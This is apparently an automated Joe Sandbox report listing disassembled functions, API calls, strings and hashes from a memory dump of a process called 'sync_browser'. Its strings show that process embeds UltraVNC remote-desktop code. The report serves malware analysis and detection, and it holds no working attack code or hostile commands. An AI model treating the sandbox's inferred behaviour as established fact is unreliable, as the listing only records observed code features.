Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteIconInfoObject
String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
API String ID: 2689914137-3853778978
Opcode ID: 77911ed28bde51ff5fc71a6be3d2d9e23acdd3f772fbccf3515c1f8dc9cff10d
Instruction ID: 4a315bd32302fd5a65ab6833f5235b9f6084365a9ab9da8c979832ac7deea2fb
Opcode Fuzzy Hash: 77911ed28bde51ff5fc71a6be3d2d9e23acdd3f772fbccf3515c1f8dc9cff10d
Instruction Fuzzy Hash: 15917071A086828BEB24BF6195407BDA7A4FB84F88FC04532EE4D97A55DF3CE149C720

Function 00007FF7D59A0160 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00007FF7D59A0180
GlobalFree.KERNEL32 ref: 00007FF7D59A0196
GlobalAlloc.KERNEL32 ref: 00007FF7D59A023D
GlobalLock.KERNEL32 ref: 00007FF7D59A0256
malloc.LIBCMT ref: 00007FF7D59A0325

Strings

Unable to allocate memory in zip dll, xrefs: 00007FF7D59A033B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$Lock$AllocFreemalloc
String ID: Unable to allocate memory in zip dll
API String ID: 105282483-1808592719
Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
Instruction ID: bb57686a56ea0f93c4ace0592aae2f22ff51248a6d9d0bea16691fb2b67bd1d0
Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
Instruction Fuzzy Hash: DD713722A0AB5287EB05EF64A4502BCA7A4FF88F89FC44136DE8E57354DF38E445C320

Function 00007FF7D5940E00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 153memorythreadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF7D5940E34
GetCurrentProcess.KERNEL32 ref: 00007FF7D5940E4C
FindWindowA.USER32 ref: 00007FF7D5940E62
GetWindowThreadProcessId.USER32 ref: 00007FF7D5940E78
OpenProcess.KERNEL32 ref: 00007FF7D5940E8E
OpenProcessToken.ADVAPI32 ref: 00007FF7D5940EA8
GetTokenInformation.ADVAPI32 ref: 00007FF7D5940EF6
GetLastError.KERNEL32 ref: 00007FF7D5940F19
malloc.LIBCMT ref: 00007FF7D5940F67

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

GetTokenInformation.ADVAPI32 ref: 00007FF7D5940FA0
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF7D5940FE7
EqualSid.ADVAPI32 ref: 00007FF7D5941008
FreeSid.ADVAPI32 ref: 00007FF7D5941028

Strings

Shell_TrayWnd, xrefs: 00007FF7D5940E59

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
String ID: Shell_TrayWnd
API String ID: 1145045407-2988720461
Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction ID: 987a710312719fcb8dd16b490b26725cc9764de35e4cdd42d412d9c66203c711
Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction Fuzzy Hash: D5616E22A146828BEB50AF30D4406ADA7A4FF84B9CFC44136EE4D07A98DF3CE954C760

Function 00007FF7D5936E00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00007FF7D5936300), ref: 00007FF7D5936E32
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF7D5936300), ref: 00007FF7D5936E6B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF7D5936300), ref: 00007FF7D5936F9E

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,00007FF7D5936300), ref: 00007FF7D5936EB7
lstrlenA.KERNEL32 ref: 00007FF7D5936F64
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00007FF7D5936300), ref: 00007FF7D5936F87

Strings

System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF7D5936E0F
ProductSuite, xrefs: 00007FF7D5936E54, 00007FF7D5936EA3
Enterprise, xrefs: 00007FF7D5936F22
Small Business, xrefs: 00007FF7D5936F0F
@, xrefs: 00007FF7D5936F51
Terminal Server, xrefs: 00007FF7D5936EE0
Personal, xrefs: 00007FF7D5936F3E
SBS, xrefs: 00007FF7D5936EFC

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Openlstrlenmalloc
String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
API String ID: 1137168859-3840687832
Opcode ID: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
Instruction ID: 3b156144683452f3d8456baceb038925f2cf317c4e5c67aab57cf45cc2994c83
Opcode Fuzzy Hash: 32626daec1fe8a25ead540a82463a4f86ecf2e9460f47b6cecf95af5a5135861
Instruction Fuzzy Hash: E0416D31A0C65287FA10AB25E44467DEBA1EF85BC8FC40032EE9D47A69DF3CE155CB20

Function 00007FF7D59F1630 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7D59F1651
_errno.LIBCMT ref: 00007FF7D59F165C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F1667
_getdrive.LIBCMT ref: 00007FF7D59F1671
_errno.LIBCMT ref: 00007FF7D59F1681
GetFullPathNameA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D59F1783,?,?,?), ref: 00007FF7D59F16C8
_errno.LIBCMT ref: 00007FF7D59F16E0

Strings

:., xrefs: 00007FF7D59F169F
., xrefs: 00007FF7D59F16B2

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
String ID: .$:.
API String ID: 2522281643-2811378331
Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
Instruction ID: bdfa0d7851f305c7665425219b84aeb5f1c80149b503944400af907c2b7ead3e
Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
Instruction Fuzzy Hash: 39314C22A0D68287FB617B64D40037EA6A0AF85F48FD94437EE4C46686DF7CE94097B1

Function 00007FF7D5942880 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85libraryregistryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D59428CC
GetProcAddress.KERNEL32 ref: 00007FF7D59428E9
RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF7D5942918
SetServiceStatus.ADVAPI32 ref: 00007FF7D5942942
CreateEventA.KERNEL32 ref: 00007FF7D5942952
SetServiceStatus.ADVAPI32 ref: 00007FF7D5942991
GetSystemMetrics.USER32 ref: 00007FF7D594299C
SetServiceStatus.ADVAPI32 ref: 00007FF7D59429CD
CloseHandle.KERNEL32 ref: 00007FF7D59429DF
SetServiceStatus.ADVAPI32 ref: 00007FF7D5942A0B
FreeLibrary.KERNEL32 ref: 00007FF7D5942A1A

Strings

RegisterServiceCtrlHandlerExA, xrefs: 00007FF7D59428DF
uvnc_service, xrefs: 00007FF7D59428F7
advapi32.dll, xrefs: 00007FF7D59428C5

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
API String ID: 333848887-3586523739
Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
Instruction ID: e115f8a4d05e7ed2f5d5562625f7d7d8244abef4ee3eb5087e709bb4b4804998
Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
Instruction Fuzzy Hash: C8414C31918B6687FA08BB69F854A7DABA0BF84F94FC04137DC5D066A4DF3CA444C724

Function 00007FF7D59609F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

SetRect.USER32 ref: 00007FF7D5960A2D
SetTextColor.GDI32 ref: 00007FF7D5960A3F
SetBkColor.GDI32 ref: 00007FF7D5960A54
CreateSolidBrush.GDI32 ref: 00007FF7D5960A62
SelectObject.GDI32 ref: 00007FF7D5960A79
FillRect.USER32 ref: 00007FF7D5960A9A
DrawTextA.USER32 ref: 00007FF7D5960AC1
SetBkColor.GDI32 ref: 00007FF7D5960AD1
SetTextColor.GDI32 ref: 00007FF7D5960AE1
SelectObject.GDI32 ref: 00007FF7D5960AF1
DeleteObject.GDI32 ref: 00007FF7D5960AFA
GdiFlush.GDI32 ref: 00007FF7D5960B22

Part of subcall function 00007FF7D5961540: GetDIBits.GDI32 ref: 00007FF7D59615C1

Strings

x, xrefs: 00007FF7D5960A25
UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF7D5960AAC

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
API String ID: 3190128964-2508378015
Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
Instruction ID: 713f905e34732fd146785baeb0d7bad5a227a081d28bd54e343e8091a4e5393c
Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
Instruction Fuzzy Hash: B8313D266186928BE740AF69E4449AEB760FFC9F98F840032EE4E47718DF7CD445C720

Function 00007FF7D5966D40 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 226threadtimeCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF7D5966DCF
CreateThread.KERNEL32 ref: 00007FF7D5966F11
timeGetTime.WINMM ref: 00007FF7D5966F38
CreateRectRgn.GDI32 ref: 00007FF7D5967052
CombineRgn.GDI32 ref: 00007FF7D596706B
DeleteObject.GDI32 ref: 00007FF7D5967074
free.LIBCMT ref: 00007FF7D596707D
GetForegroundWindow.USER32 ref: 00007FF7D59670B1
GetCursorPos.USER32 ref: 00007FF7D59670FD
WindowFromPoint.USER32 ref: 00007FF7D596710C
GetDesktopWindow.USER32 ref: 00007FF7D596711F

Part of subcall function 00007FF7D59E7DE8: _errno.LIBCMT ref: 00007FF7D59E7E00
Part of subcall function 00007FF7D59E7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E7E0C

Strings

schook, xrefs: 00007FF7D5966D94
w8hook, xrefs: 00007FF7D5966EC2

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
String ID: schook$w8hook
API String ID: 2828954817-2864610768
Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
Instruction ID: abc7f39424473c92177d282456fd2e4e7dd727001bd3579c9c5891d46f8ec560
Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
Instruction Fuzzy Hash: 06B14E32A0978687EB64AB25E4405AEB7A0FB84F88FC44137DE9E53755DF38E485C321

Function 00007FF7D5945EF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 171windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF7D5945F47

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

Part of subcall function 00007FF7D59470B0: EnumDisplaySettingsA.USER32 ref: 00007FF7D59470F4
Part of subcall function 00007FF7D59470B0: LoadLibraryA.KERNEL32 ref: 00007FF7D5947109
Part of subcall function 00007FF7D59470B0: GetProcAddress.KERNEL32 ref: 00007FF7D594712D
Part of subcall function 00007FF7D59470B0: FreeLibrary.KERNEL32 ref: 00007FF7D59471F2

malloc.LIBCMT ref: 00007FF7D5945F53
GetDC.USER32 ref: 00007FF7D5945FBD
GetSystemPaletteEntries.GDI32 ref: 00007FF7D5945FE7
GetLastError.KERNEL32 ref: 00007FF7D5945FF0
DeleteDC.GDI32 ref: 00007FF7D5946021
ReleaseDC.USER32 ref: 00007FF7D594602E

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7D5945F1B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7D5945F61
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7D5945FC8
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7D5946160
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7D5945FAF
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7D5945FF6

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
Instruction ID: 87d7502a740fdfe57869e3a02fd7d84b6c4138c889b11c6eae87760926e39c1e
Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
Instruction Fuzzy Hash: 86612861A196D282E718AB65E4117FDBB90EF95B48FC44037EE9E4B291DF3CD50AC320

Function 00007FF7D5945550 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 162windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF7D59455A5

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

Part of subcall function 00007FF7D59470B0: EnumDisplaySettingsA.USER32 ref: 00007FF7D59470F4
Part of subcall function 00007FF7D59470B0: LoadLibraryA.KERNEL32 ref: 00007FF7D5947109
Part of subcall function 00007FF7D59470B0: GetProcAddress.KERNEL32 ref: 00007FF7D594712D
Part of subcall function 00007FF7D59470B0: FreeLibrary.KERNEL32 ref: 00007FF7D59471F2

malloc.LIBCMT ref: 00007FF7D59455AF
GetDC.USER32 ref: 00007FF7D5945611
GetSystemPaletteEntries.GDI32 ref: 00007FF7D594563B
GetLastError.KERNEL32 ref: 00007FF7D5945644
DeleteDC.GDI32 ref: 00007FF7D5945675
ReleaseDC.USER32 ref: 00007FF7D5945682

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7D594557A
